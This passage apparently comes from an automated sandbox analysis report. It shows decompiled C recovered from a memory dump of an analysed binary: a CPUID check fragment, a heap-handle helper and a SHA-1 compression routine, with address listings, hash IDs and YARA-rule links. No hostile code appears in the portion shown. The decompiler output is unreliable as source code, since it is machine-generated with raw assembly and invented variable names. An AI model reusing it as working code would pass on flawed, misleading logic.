							_push(2);
							L3:
							_pop(_t35);
							return _t35;
						}
						_push(3);
						goto L3;
					}
					_push(4);
					goto L3;
				}
				asm("cpuid");
				_t42 =  &_v20;
				 *_t42 = _t29;
				 *((intOrPtr*)(_t42 + 4)) = _t36;
				 *((intOrPtr*)(_t42 + 8)) = 0;
				 *((intOrPtr*)(_t42 + 0xc)) = __edx;
				if((_v16 & 0x00000020) == 0) {
					goto L4;
				}
				_push(5);
				goto L3;
			}















                                                                                                                0x00ec6951
                                                                                                                0x00ec6959
                                                                                                                0x00ec6963
                                                                                                                0x00ec6965
                                                                                                                0x00ec6967
                                                                                                                0x00ec696a
                                                                                                                0x00ec696d
                                                                                                                0x00ec6975
                                                                                                                0x00ec697b
                                                                                                                0x00ec697e
                                                                                                                0x00ec699f
                                                                                                                0x00ec69a2
                                                                                                                0x00ec69ee
                                                                                                                0x00000000
                                                                                                                0x00ec69ee
                                                                                                                0x00ec69a6
                                                                                                                0x00ec69ac
                                                                                                                0x00ec69ae
                                                                                                                0x00ec69b0
                                                                                                                0x00ec69b3
                                                                                                                0x00ec69b6
                                                                                                                0x00ec69c0
                                                                                                                0x00ec69cd
                                                                                                                0x00ec69da
                                                                                                                0x00ec69e7
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ec69eb
                                                                                                                0x00ec69dc
                                                                                                                0x00ec699c
                                                                                                                0x00ec699c
                                                                                                                0x00000000
                                                                                                                0x00ec699c
                                                                                                                0x00ec69cf
                                                                                                                0x00000000
                                                                                                                0x00ec69cf
                                                                                                                0x00ec69c2
                                                                                                                0x00000000
                                                                                                                0x00ec69c2
                                                                                                                0x00ec6982
                                                                                                                0x00ec6985
                                                                                                                0x00ec6988
                                                                                                                0x00ec698a
                                                                                                                0x00ec698d
                                                                                                                0x00ec6990
                                                                                                                0x00ec6998
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ec699a
                                                                                                                0x00000000

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.504263666.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.504220943.0000000000EC0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505107406.0000000000EE7000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505236670.0000000000EF1000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505296900.0000000000EF7000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505341126.0000000000F06000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505375670.0000000000F25000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505408633.0000000000F26000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID: 0-3916222277
                                                                                                                • Opcode ID: 0ff90eb230b52437a63d9367876266d472b439a44e373492e273288ba9874bb5
                                                                                                                • Instruction ID: 5d5282042ddae32b0276f12a26ee2017c95935c0216392483a65a52ed3bf9df3
                                                                                                                • Opcode Fuzzy Hash: 0ff90eb230b52437a63d9367876266d472b439a44e373492e273288ba9874bb5
                                                                                                                • Instruction Fuzzy Hash: 721187729047169AD7148F5C9A45B9BF7F4FB88314F20D52ED86EF3180C332A5518B44
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00EE07E0, Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00EE07E0() {
				signed int _t3;

				_t3 = GetProcessHeap();
				 *0xf25d54 = _t3;
				return _t3 & 0xffffff00 | _t3 != 0x00000000;
			}




                                                                                                                0x00ee07e0
                                                                                                                0x00ee07e8
                                                                                                                0x00ee07f0

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.504263666.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.504220943.0000000000EC0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505107406.0000000000EE7000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505236670.0000000000EF1000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505296900.0000000000EF7000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505341126.0000000000F06000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505375670.0000000000F25000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505408633.0000000000F26000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: HeapProcess
                                                                                                                • String ID:
                                                                                                                • API String ID: 54951025-0
                                                                                                                • Opcode ID: 15ef5f9848f141b276211b38f9b17f4a8b8c78c3eab95df6fb0df83602cb775b
                                                                                                                • Instruction ID: 616d32ae0a7c177c217ec6d258879a6c2ae2b01013122437f4ecd9a24bbd92b1
                                                                                                                • Opcode Fuzzy Hash: 15ef5f9848f141b276211b38f9b17f4a8b8c78c3eab95df6fb0df83602cb775b
                                                                                                                • Instruction Fuzzy Hash: DBA012301062448F83004F32AA08208369466045803004058A400D9030E63444445601
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00EC5894, Relevance: .7, Instructions: 694COMMONCrypto
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 70%
                                                                                                                			E00EC5894(signed int* _a4, signed int* _a8, signed int* _a12, char _a16) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int* _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _t429;
				intOrPtr _t431;
				intOrPtr _t436;
				void* _t441;
				intOrPtr _t443;
				signed int _t446;
				void* _t448;
				signed int _t454;
				signed int _t460;
				signed int _t466;
				signed int _t474;
				signed int _t482;
				signed int _t489;
				signed int _t512;
				signed int _t519;
				signed int _t526;
				signed int _t546;
				signed int _t555;
				signed int _t564;
				signed int* _t592;
				signed int _t593;
				signed int _t595;
				signed int _t596;
				signed int* _t597;
				signed int _t598;
				signed int _t599;
				signed int _t601;
				signed int _t603;
				signed int _t604;
				signed int* _t605;
				signed int _t606;
				signed int* _t670;
				signed int* _t741;
				signed int _t752;
				signed int _t769;
				signed int _t773;
				signed int _t777;
				signed int _t781;
				signed int _t782;
				signed int _t786;
				signed int _t787;
				signed int _t791;
				signed int _t796;
				signed int _t800;
				signed int _t804;
				signed int _t806;
				signed int _t809;
				signed int* _t811;
				signed int _t814;
				signed int _t815;
				signed int _t816;
				signed int _t820;
				signed int _t821;
				signed int _t825;
				signed int _t830;
				signed int _t834;
				signed int _t838;
				signed int* _t839;
				signed int _t841;
				signed int _t842;
				signed int _t844;
				signed int _t845;
				signed int _t847;
				signed int* _t848;
				signed int _t851;
				signed int* _t854;
				signed int _t855;
				signed int _t857;
				signed int _t858;
				signed int _t862;
				signed int _t863;
				signed int _t867;
				signed int _t871;
				signed int _t875;
				signed int _t879;
				signed int _t880;
				signed int* _t881;
				signed int _t882;
				signed int _t884;
				signed int _t885;
				signed int _t886;
				signed int _t887;
				signed int _t888;
				signed int _t890;
				signed int _t891;
				signed int _t893;
				signed int _t894;
				signed int _t896;
				signed int _t897;
				signed int* _t898;
				signed int _t899;
				signed int _t901;
				signed int _t902;
				signed int _t904;
				signed int _t905;

				_t906 =  &_v40;
				if(_a16 == 0) {
					_t839 = _a8;
					_v20 = _t839;
					E00ED4C60(_t839, _a12, 0x40);
					_t906 =  &(( &_v40)[3]);
				} else {
					_t839 = _a12;
					_v20 = _t839;
				}
				_t848 = _a4;
				_t593 =  *_t848;
				_t886 = _t848[1];
				_v24 = _t848[2];
				_v28 = _t848[3];
				_v36 = 0;
				_t429 = E00EDB0C4( *_t839);
				asm("rol edx, 0x5");
				 *_t839 = _t429;
				_t851 = _t848[4] + 0x5a827999 + ((_v28 ^ _v24) & _t886 ^ _v28) + _t593 + _t429;
				_t430 = _t839;
				asm("ror ebp, 0x2");
				_v16 = _t839;
				_v32 =  &(_t839[3]);
				do {
					_t431 = E00EDB0C4(_t430[1]);
					asm("rol edx, 0x5");
					 *((intOrPtr*)(_v16 + 4)) = _t431;
					asm("ror ebx, 0x2");
					_v28 = _v28 + 0x5a827999 + ((_v24 ^ _t886) & _t593 ^ _v24) + _t851 + _t431;
					_t436 = E00EDB0C4( *((intOrPtr*)(_v32 - 4)));
					asm("rol edx, 0x5");
					 *((intOrPtr*)(_v32 - 4)) = _t436;
					asm("ror esi, 0x2");
					_v24 = _v24 + 0x5a827999 + ((_t886 ^ _t593) & _t851 ^ _t886) + _v28 + _t436;
					_t441 = E00EDB0C4( *_v32);
					asm("rol edx, 0x5");
					 *_v32 = _t441;
					asm("ror dword [esp+0x28], 0x2");
					_t886 = _t886 + ((_t851 ^ _t593) & _v28 ^ _t593) + _v24 + 0x5a827999 + _t441;
					_t443 = E00EDB0C4( *((intOrPtr*)(_v32 + 4)));
					_v32 = _v32 + 0x14;
					asm("rol edx, 0x5");
					 *((intOrPtr*)(_v32 + 4)) = _t443;
					_t446 = _v36 + 5;
					asm("ror dword [esp+0x30], 0x2");
					_v36 = _t446;
					_t593 = _t593 + ((_t851 ^ _v28) & _v24 ^ _t851) + _t886 + _t443 + 0x5a827999;
					_v16 =  &(_t839[_t446]);
					_t448 = E00EDB0C4(_t839[_t446]);
					_t906 =  &(_t906[5]);
					asm("rol edx, 0x5");
					 *_v16 = _t448;
					_t430 = _v16;
					asm("ror ebp, 0x2");
					_t851 = _t851 + 0x5a827999 + ((_v28 ^ _v24) & _t886 ^ _v28) + _t593 + _t448;
				} while (_v36 != 0xf);
				_t769 = _t839[0xd] ^ _t839[8] ^ _t839[2] ^  *_t839;
				asm("rol edx, 1");
				asm("rol ecx, 0x5");
				 *_t839 = _t769;
				_t454 = ((_v24 ^ _t886) & _t593 ^ _v24) + _t851 + _t769 + _v28 + 0x5a827999;
				_t773 = _t839[0xe] ^ _t839[9] ^ _t839[3] ^ _t839[1];
				_v40 = _t454;
				asm("rol edx, 1");
				asm("rol ecx, 0x5");
				asm("ror ebx, 0x2");
				_t839[1] = _t773;
				_t777 = _t839[0xf] ^ _t839[0xa] ^ _t839[4] ^ _t839[2];
				_t460 = ((_t886 ^ _t593) & _t851 ^ _t886) + _t454 + _t773 + _v24 + 0x5a827999;
				asm("ror esi, 0x2");
				_v32 = _t460;
				asm("rol edx, 1");
				asm("rol ecx, 0x5");
				_t839[2] = _t777;
				_t466 = ((_t851 ^ _t593) & _v40 ^ _t593) + _t460 + 0x5a827999 + _t777 + _t886;
				_t887 = _v40;
				_t781 = _t839[0xb] ^ _t839[5] ^ _t839[3] ^  *_t839;
				_v28 = _t466;
				asm("ror ebp, 0x2");
				_v40 = _t887;
				_t888 = _v32;
				asm("rol edx, 1");
				asm("rol ecx, 0x5");
				_t839[3] = _t781;
				asm("ror ebp, 0x2");
				_t782 = 0x11;
				_v36 = ((_t851 ^ _t887) & _t888 ^ _t851) + 0x5a827999 + _t466 + _t781 + _t593;
				_v32 = _t888;
				_v16 = _t782;
				do {
					_t89 = _t782 + 5; // 0x16
					_t474 = _t89;
					_v8 = _t474;
					_t91 = _t782 - 5; // 0xc
					_t92 = _t782 + 3; // 0x14
					_t890 = _t92 & 0x0000000f;
					_t595 = _t474 & 0x0000000f;
					_v12 = _t890;
					_t786 = _t839[_t91 & 0x0000000f] ^ _t839[_t782 & 0x0000000f] ^ _t839[_t595] ^ _t839[_t890];
					asm("rol edx, 1");
					_t839[_t890] = _t786;
					_t891 = _v28;
					asm("rol ecx, 0x5");
					asm("ror ebp, 0x2");
					_v28 = _t891;
					_t482 = _v16;
					_v24 = _t851 + (_v40 ^ _v32 ^ _t891) + 0x6ed9eba1 + _v36 + _t786;
					_t854 = _v20;
					_t787 = 0xf;
					_t841 = _t482 + 0x00000006 & _t787;
					_t893 = _t482 + 0x00000004 & _t787;
					_t791 =  *(_t854 + (_t482 - 0x00000004 & _t787) * 4) ^  *(_t854 + (_t482 + 0x00000001 & _t787) * 4) ^  *(_t854 + _t893 * 4) ^  *(_t854 + _t841 * 4);
					asm("rol edx, 1");
					 *(_t854 + _t893 * 4) = _t791;
					_t855 = _v36;
					asm("rol ecx, 0x5");
					asm("ror esi, 0x2");
					_v36 = _t855;
					_t489 = _v16;
					_v40 = _v40 + 0x6ed9eba1 + (_v32 ^ _v28 ^ _t855) + _v24 + _t791;
					_t857 = _t489 + 0x00000007 & 0x0000000f;
					_t670 = _v20;
					_t796 = _v20[_t489 - 0x00000003 & 0x0000000f] ^  *(_t670 + (_t489 + 0x00000002 & 0x0000000f) * 4) ^  *(_t670 + _t595 * 4) ^  *(_t670 + _t857 * 4);
					asm("rol edx, 1");
					 *(_t670 + _t595 * 4) = _t796;
					_t596 = _v24;
					asm("rol ecx, 0x5");
					asm("ror ebx, 0x2");
					_v24 = _t596;
					_t597 = _v20;
					_v32 = _v32 + 0x6ed9eba1 + (_t596 ^ _v28 ^ _v36) + _v40 + _t796;
					asm("rol ecx, 0x5");
					_t800 =  *(_t597 + (_v16 - 0x00000008 & 0x0000000f) * 4) ^  *(_t597 + (_v16 + 0xfffffffe & 0x0000000f) * 4) ^  *(_t597 + _t841 * 4) ^  *(_t597 + _v12 * 4);
					asm("rol edx, 1");
					 *(_t597 + _t841 * 4) = _t800;
					_t598 = _v40;
					_t839 = _v20;
					asm("ror ebx, 0x2");
					_v40 = _t598;
					_v28 = _v28 + 0x6ed9eba1 + (_v24 ^ _t598 ^ _v36) + _v32 + _t800;
					_t804 = _t839[_v16 - 0x00000007 & 0x0000000f] ^ _t839[_v16 - 0x00000001 & 0x0000000f] ^ _t839[_t893] ^ _t839[_t857];
					_t894 = _v32;
					asm("rol edx, 1");
					_t839[_t857] = _t804;
					_t851 = _v24;
					asm("rol ecx, 0x5");
					_t782 = _v8;
					asm("ror ebp, 0x2");
					_v32 = _t894;
					_v36 = _v36 + 0x6ed9eba1 + (_t851 ^ _t598 ^ _t894) + _v28 + _t804;
					_v16 = _t782;
				} while (_t782 + 3 <= 0x23);
				_t858 = 0x25;
				_v16 = _t858;
				while(1) {
					_t199 = _t858 + 5; // 0x2a
					_t512 = _t199;
					_t200 = _t858 - 5; // 0x20
					_v4 = _t512;
					_t202 = _t858 + 3; // 0x28
					_t806 = _t202 & 0x0000000f;
					_v8 = _t806;
					_t896 = _t512 & 0x0000000f;
					_t862 = _t839[_t200 & 0x0000000f] ^ _t839[_t858 & 0x0000000f] ^ _t839[_t806] ^ _t839[_t896];
					asm("rol esi, 1");
					_t599 = _v28;
					_t839[_t806] = _t862;
					asm("rol edx, 0x5");
					asm("ror ebx, 0x2");
					_t863 = 0xf;
					_v28 = _t599;
					_v24 = _v36 - 0x70e44324 + ((_v32 | _v28) & _t598 | _v32 & _t599) + _t862 + _v24;
					_t519 = _v16;
					_t601 = _t519 + 0x00000006 & _t863;
					_t809 = _t519 + 0x00000004 & _t863;
					_v12 = _t809;
					_t867 = _t839[_t519 - 0x00000004 & _t863] ^ _t839[_t519 + 0x00000001 & _t863] ^ _t839[_t809] ^ _t839[_t601];
					asm("rol esi, 1");
					_t839[_t809] = _t867;
					_t842 = _v36;
					asm("rol edx, 0x5");
					asm("ror edi, 0x2");
					_v36 = _t842;
					_t811 = _v20;
					_v40 = _v24 - 0x70e44324 + ((_v28 | _t842) & _v32 | _v28 & _t842) + _t867 + _v40;
					_t526 = _v16;
					_t844 = _t526 + 0x00000007 & 0x0000000f;
					_t871 =  *(_t811 + (_t526 - 0x00000003 & 0x0000000f) * 4) ^  *(_t811 + (_t526 + 0x00000002 & 0x0000000f) * 4) ^  *(_t811 + _t844 * 4) ^  *(_t811 + _t896 * 4);
					asm("rol esi, 1");
					 *(_t811 + _t896 * 4) = _t871;
					_t897 = _v24;
					asm("rol edx, 0x5");
					asm("ror ebp, 0x2");
					_t814 = _v40 + 0x8f1bbcdc + ((_t897 | _v36) & _v28 | _t897 & _v36) + _t871 + _v32;
					_v24 = _t897;
					_t898 = _v20;
					_v32 = _t814;
					asm("rol edx, 0x5");
					_t875 =  *(_t898 + (_v16 - 0x00000008 & 0x0000000f) * 4) ^  *(_t898 + (_v16 + 0xfffffffe & 0x0000000f) * 4) ^  *(_t898 + _v8 * 4) ^  *(_t898 + _t601 * 4);
					asm("rol esi, 1");
					 *(_t898 + _t601 * 4) = _t875;
					_t598 = _v40;
					asm("ror ebx, 0x2");
					_v40 = _t598;
					_t815 = _t814 + ((_v24 | _t598) & _v36 | _v24 & _t598) + 0x8f1bbcdc + _t875 + _v28;
					_v28 = _t815;
					asm("rol edx, 0x5");
					_t879 =  *(_t898 + (_v16 - 0x00000007 & 0x0000000f) * 4) ^  *(_t898 + (_v16 - 0x00000001 & 0x0000000f) * 4) ^  *(_t898 + _t844 * 4) ^  *(_t898 + _v12 * 4);
					asm("rol esi, 1");
					 *(_t898 + _t844 * 4) = _t879;
					_t899 = _v32;
					_t845 = _v24;
					asm("ror ebp, 0x2");
					_v32 = _t899;
					_t858 = _v4;
					_v36 = _t815 - 0x70e44324 + ((_t598 | _t899) & _t845 | _t598 & _t899) + _t879 + _v36;
					_v16 = _t858;
					if(_t858 + 3 > 0x37) {
						break;
					}
					_t839 = _v20;
				}
				_t816 = 0x39;
				_v16 = _t816;
				do {
					_t310 = _t816 + 5; // 0x3e
					_t546 = _t310;
					_v8 = _t546;
					_t312 = _t816 + 3; // 0x3c
					_t313 = _t816 - 5; // 0x34
					_t880 = 0xf;
					_t901 = _t312 & _t880;
					_t603 = _t546 & _t880;
					_t881 = _v20;
					_v4 = _t901;
					_t820 =  *(_t881 + (_t313 & _t880) * 4) ^  *(_t881 + (_t816 & _t880) * 4) ^  *(_t881 + _t603 * 4) ^  *(_t881 + _t901 * 4);
					asm("rol edx, 1");
					 *(_t881 + _t901 * 4) = _t820;
					_t902 = _v28;
					asm("rol ecx, 0x5");
					asm("ror ebp, 0x2");
					_v28 = _t902;
					_v24 = (_v40 ^ _v32 ^ _t902) + _t820 + _t845 + _v36 + 0xca62c1d6;
					_t555 = _v16;
					_t821 = 0xf;
					_t847 = _t555 + 0x00000006 & _t821;
					_t904 = _t555 + 0x00000004 & _t821;
					_t825 =  *(_t881 + (_t555 - 0x00000004 & _t821) * 4) ^  *(_t881 + (_t555 + 0x00000001 & _t821) * 4) ^  *(_t881 + _t904 * 4) ^  *(_t881 + _t847 * 4);
					asm("rol edx, 1");
					 *(_t881 + _t904 * 4) = _t825;
					_t882 = _v36;
					asm("rol ecx, 0x5");
					_v40 = (_v32 ^ _v28 ^ _t882) + _t825 + _v40 + _v24 + 0xca62c1d6;
					_t564 = _v16;
					asm("ror esi, 0x2");
					_v36 = _t882;
					_t884 = _t564 + 0x00000007 & 0x0000000f;
					_t741 = _v20;
					_t830 = _v20[_t564 - 0x00000003 & 0x0000000f] ^  *(_t741 + (_t564 + 0x00000002 & 0x0000000f) * 4) ^  *(_t741 + _t603 * 4) ^  *(_t741 + _t884 * 4);
					asm("rol edx, 1");
					 *(_t741 + _t603 * 4) = _t830;
					_t604 = _v24;
					asm("rol ecx, 0x5");
					asm("ror ebx, 0x2");
					_v24 = _t604;
					_t605 = _v20;
					_v32 = (_t604 ^ _v28 ^ _v36) + _t830 + _v32 + _v40 + 0xca62c1d6;
					asm("rol ecx, 0x5");
					_t834 = _t605[_v16 - 0x00000008 & 0x0000000f] ^ _t605[_v16 + 0xfffffffe & 0x0000000f] ^ _t605[_t847] ^ _t605[_v4];
					asm("rol edx, 1");
					_t605[_t847] = _t834;
					_t845 = _v24;
					asm("ror dword [esp+0x10], 0x2");
					_v28 = (_t845 ^ _v40 ^ _v36) + _t834 + _v28 + _v32 + 0xca62c1d6;
					_t838 = _t605[_v16 - 0x00000007 & 0x0000000f] ^ _t605[_v16 - 0x00000001 & 0x0000000f] ^ _t605[_t904] ^ _t605[_t884];
					_t905 = _v32;
					asm("rol edx, 1");
					_t605[_t884] = _t838;
					_t606 = _v40;
					_t885 = _v28;
					asm("ror ebp, 0x2");
					_t816 = _v8;
					asm("rol ecx, 0x5");
					_v32 = _t905;
					_t752 = _t885 + 0xca62c1d6 + (_t845 ^ _t606 ^ _t905) + _t838 + _v36;
					_v16 = _t816;
					_v36 = _t752;
				} while (_t816 + 3 <= 0x4b);
				_t592 = _a4;
				_t592[1] = _t592[1] + _t885;
				_t592[2] = _t592[2] + _t905;
				_t592[3] = _t592[3] + _t606;
				 *_t592 =  *_t592 + _t752;
				_t592[4] = _t592[4] + _t845;
				return _t592;
			}












































































































                                                                                                                0x00ec5894
                                                                                                                0x00ec58a0
                                                                                                                0x00ec58ac
                                                                                                                0x00ec58b6
                                                                                                                0x00ec58bb
                                                                                                                0x00ec58c0
                                                                                                                0x00ec58a2
                                                                                                                0x00ec58a2
                                                                                                                0x00ec58a6
                                                                                                                0x00ec58a6
                                                                                                                0x00ec58c3
                                                                                                                0x00ec58cc
                                                                                                                0x00ec58ce
                                                                                                                0x00ec58d1
                                                                                                                0x00ec58db
                                                                                                                0x00ec58e1
                                                                                                                0x00ec58e5
                                                                                                                0x00ec58fd
                                                                                                                0x00ec5908
                                                                                                                0x00ec590a
                                                                                                                0x00ec590c
                                                                                                                0x00ec5911
                                                                                                                0x00ec5914
                                                                                                                0x00ec5918
                                                                                                                0x00ec591c
                                                                                                                0x00ec591f
                                                                                                                0x00ec592a
                                                                                                                0x00ec592f
                                                                                                                0x00ec5949
                                                                                                                0x00ec594e
                                                                                                                0x00ec5959
                                                                                                                0x00ec5966
                                                                                                                0x00ec596b
                                                                                                                0x00ec597f
                                                                                                                0x00ec5986
                                                                                                                0x00ec5990
                                                                                                                0x00ec599d
                                                                                                                0x00ec59a6
                                                                                                                0x00ec59b6
                                                                                                                0x00ec59c2
                                                                                                                0x00ec59c4
                                                                                                                0x00ec59cf
                                                                                                                0x00ec59d4
                                                                                                                0x00ec59d7
                                                                                                                0x00ec59eb
                                                                                                                0x00ec59f2
                                                                                                                0x00ec59f9
                                                                                                                0x00ec5a02
                                                                                                                0x00ec5a06
                                                                                                                0x00ec5a0a
                                                                                                                0x00ec5a15
                                                                                                                0x00ec5a18
                                                                                                                0x00ec5a1b
                                                                                                                0x00ec5a27
                                                                                                                0x00ec5a39
                                                                                                                0x00ec5a3c
                                                                                                                0x00ec5a3e
                                                                                                                0x00ec5a54
                                                                                                                0x00ec5a5c
                                                                                                                0x00ec5a60
                                                                                                                0x00ec5a6b
                                                                                                                0x00ec5a7d
                                                                                                                0x00ec5a84
                                                                                                                0x00ec5a87
                                                                                                                0x00ec5a8d
                                                                                                                0x00ec5a8f
                                                                                                                0x00ec5a94
                                                                                                                0x00ec5a99
                                                                                                                0x00ec5aaf
                                                                                                                0x00ec5ab8
                                                                                                                0x00ec5aba
                                                                                                                0x00ec5abd
                                                                                                                0x00ec5ac3
                                                                                                                0x00ec5ac9
                                                                                                                0x00ec5ad8
                                                                                                                0x00ec5ae8
                                                                                                                0x00ec5aea
                                                                                                                0x00ec5af0
                                                                                                                0x00ec5af2
                                                                                                                0x00ec5af8
                                                                                                                0x00ec5afd
                                                                                                                0x00ec5b01
                                                                                                                0x00ec5b07
                                                                                                                0x00ec5b0b
                                                                                                                0x00ec5b15
                                                                                                                0x00ec5b1c
                                                                                                                0x00ec5b21
                                                                                                                0x00ec5b22
                                                                                                                0x00ec5b26
                                                                                                                0x00ec5b2a
                                                                                                                0x00ec5b2e
                                                                                                                0x00ec5b2e
                                                                                                                0x00ec5b2e
                                                                                                                0x00ec5b33
                                                                                                                0x00ec5b37
                                                                                                                0x00ec5b3f
                                                                                                                0x00ec5b45
                                                                                                                0x00ec5b48
                                                                                                                0x00ec5b4b
                                                                                                                0x00ec5b5a
                                                                                                                0x00ec5b69
                                                                                                                0x00ec5b6b
                                                                                                                0x00ec5b6e
                                                                                                                0x00ec5b74
                                                                                                                0x00ec5b7e
                                                                                                                0x00ec5b83
                                                                                                                0x00ec5b89
                                                                                                                0x00ec5b8d
                                                                                                                0x00ec5b91
                                                                                                                0x00ec5b95
                                                                                                                0x00ec5b99
                                                                                                                0x00ec5b9e
                                                                                                                0x00ec5bb1
                                                                                                                0x00ec5bc0
                                                                                                                0x00ec5bc2
                                                                                                                0x00ec5bc5
                                                                                                                0x00ec5bcb
                                                                                                                0x00ec5bd0
                                                                                                                0x00ec5be3
                                                                                                                0x00ec5be9
                                                                                                                0x00ec5bed
                                                                                                                0x00ec5bfd
                                                                                                                0x00ec5c06
                                                                                                                0x00ec5c10
                                                                                                                0x00ec5c13
                                                                                                                0x00ec5c15
                                                                                                                0x00ec5c1c
                                                                                                                0x00ec5c22
                                                                                                                0x00ec5c31
                                                                                                                0x00ec5c3e
                                                                                                                0x00ec5c44
                                                                                                                0x00ec5c4c
                                                                                                                0x00ec5c6d
                                                                                                                0x00ec5c70
                                                                                                                0x00ec5c77
                                                                                                                0x00ec5c7b
                                                                                                                0x00ec5c7e
                                                                                                                0x00ec5c88
                                                                                                                0x00ec5c98
                                                                                                                0x00ec5c9d
                                                                                                                0x00ec5ca5
                                                                                                                0x00ec5cbc
                                                                                                                0x00ec5cc3
                                                                                                                0x00ec5cc7
                                                                                                                0x00ec5cc9
                                                                                                                0x00ec5ccc
                                                                                                                0x00ec5cd2
                                                                                                                0x00ec5cdb
                                                                                                                0x00ec5ceb
                                                                                                                0x00ec5cf0
                                                                                                                0x00ec5cf7
                                                                                                                0x00ec5cfb
                                                                                                                0x00ec5cff
                                                                                                                0x00ec5d0a
                                                                                                                0x00ec5d0b
                                                                                                                0x00ec5d15
                                                                                                                0x00ec5d15
                                                                                                                0x00ec5d15
                                                                                                                0x00ec5d18
                                                                                                                0x00ec5d1b
                                                                                                                0x00ec5d22
                                                                                                                0x00ec5d27
                                                                                                                0x00ec5d2c
                                                                                                                0x00ec5d33
                                                                                                                0x00ec5d41
                                                                                                                0x00ec5d50
                                                                                                                0x00ec5d52
                                                                                                                0x00ec5d58
                                                                                                                0x00ec5d67
                                                                                                                0x00ec5d6a
                                                                                                                0x00ec5d6d
                                                                                                                0x00ec5d6e
                                                                                                                0x00ec5d7a
                                                                                                                0x00ec5d7e
                                                                                                                0x00ec5d88
                                                                                                                0x00ec5d8a
                                                                                                                0x00ec5d91
                                                                                                                0x00ec5da1
                                                                                                                0x00ec5daa
                                                                                                                0x00ec5dac
                                                                                                                0x00ec5daf
                                                                                                                0x00ec5dc3
                                                                                                                0x00ec5dca
                                                                                                                0x00ec5dcd
                                                                                                                0x00ec5dd7
                                                                                                                0x00ec5ddd
                                                                                                                0x00ec5de1
                                                                                                                0x00ec5df1
                                                                                                                0x00ec5e00
                                                                                                                0x00ec5e03
                                                                                                                0x00ec5e05
                                                                                                                0x00ec5e08
                                                                                                                0x00ec5e2c
                                                                                                                0x00ec5e35
                                                                                                                0x00ec5e38
                                                                                                                0x00ec5e3a
                                                                                                                0x00ec5e3e
                                                                                                                0x00ec5e48
                                                                                                                0x00ec5e4f
                                                                                                                0x00ec5e65
                                                                                                                0x00ec5e6f
                                                                                                                0x00ec5e71
                                                                                                                0x00ec5e75
                                                                                                                0x00ec5e83
                                                                                                                0x00ec5e92
                                                                                                                0x00ec5e9a
                                                                                                                0x00ec5e9f
                                                                                                                0x00ec5ea6
                                                                                                                0x00ec5ebf
                                                                                                                0x00ec5ec5
                                                                                                                0x00ec5ec7
                                                                                                                0x00ec5ecb
                                                                                                                0x00ec5ed1
                                                                                                                0x00ec5ed9
                                                                                                                0x00ec5ede
                                                                                                                0x00ec5eee
                                                                                                                0x00ec5ef4
                                                                                                                0x00ec5ef8
                                                                                                                0x00ec5f02
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ec5d11
                                                                                                                0x00ec5d11
                                                                                                                0x00ec5f0a
                                                                                                                0x00ec5f0b
                                                                                                                0x00ec5f0f
                                                                                                                0x00ec5f0f
                                                                                                                0x00ec5f0f
                                                                                                                0x00ec5f14
                                                                                                                0x00ec5f18
                                                                                                                0x00ec5f1d
                                                                                                                0x00ec5f22
                                                                                                                0x00ec5f27
                                                                                                                0x00ec5f29
                                                                                                                0x00ec5f2b
                                                                                                                0x00ec5f2f
                                                                                                                0x00ec5f3e
                                                                                                                0x00ec5f4d
                                                                                                                0x00ec5f4f
                                                                                                                0x00ec5f52
                                                                                                                0x00ec5f5a
                                                                                                                0x00ec5f5f
                                                                                                                0x00ec5f68
                                                                                                                0x00ec5f6e
                                                                                                                0x00ec5f72
                                                                                                                0x00ec5f76
                                                                                                                0x00ec5f7d
                                                                                                                0x00ec5f7f
                                                                                                                0x00ec5f92
                                                                                                                0x00ec5fa1
                                                                                                                0x00ec5fa3
                                                                                                                0x00ec5fa6
                                                                                                                0x00ec5fae
                                                                                                                0x00ec5fc1
                                                                                                                0x00ec5fc5
                                                                                                                0x00ec5fc9
                                                                                                                0x00ec5fcc
                                                                                                                0x00ec5fdc
                                                                                                                0x00ec5fe5
                                                                                                                0x00ec5fef
                                                                                                                0x00ec5ff2
                                                                                                                0x00ec5ff4
                                                                                                                0x00ec5ffb
                                                                                                                0x00ec5fff
                                                                                                                0x00ec6014
                                                                                                                0x00ec601d
                                                                                                                0x00ec6021
                                                                                                                0x00ec6025
                                                                                                                0x00ec604a
                                                                                                                0x00ec6053
                                                                                                                0x00ec6056
                                                                                                                0x00ec6058
                                                                                                                0x00ec605b
                                                                                                                0x00ec6069
                                                                                                                0x00ec6076
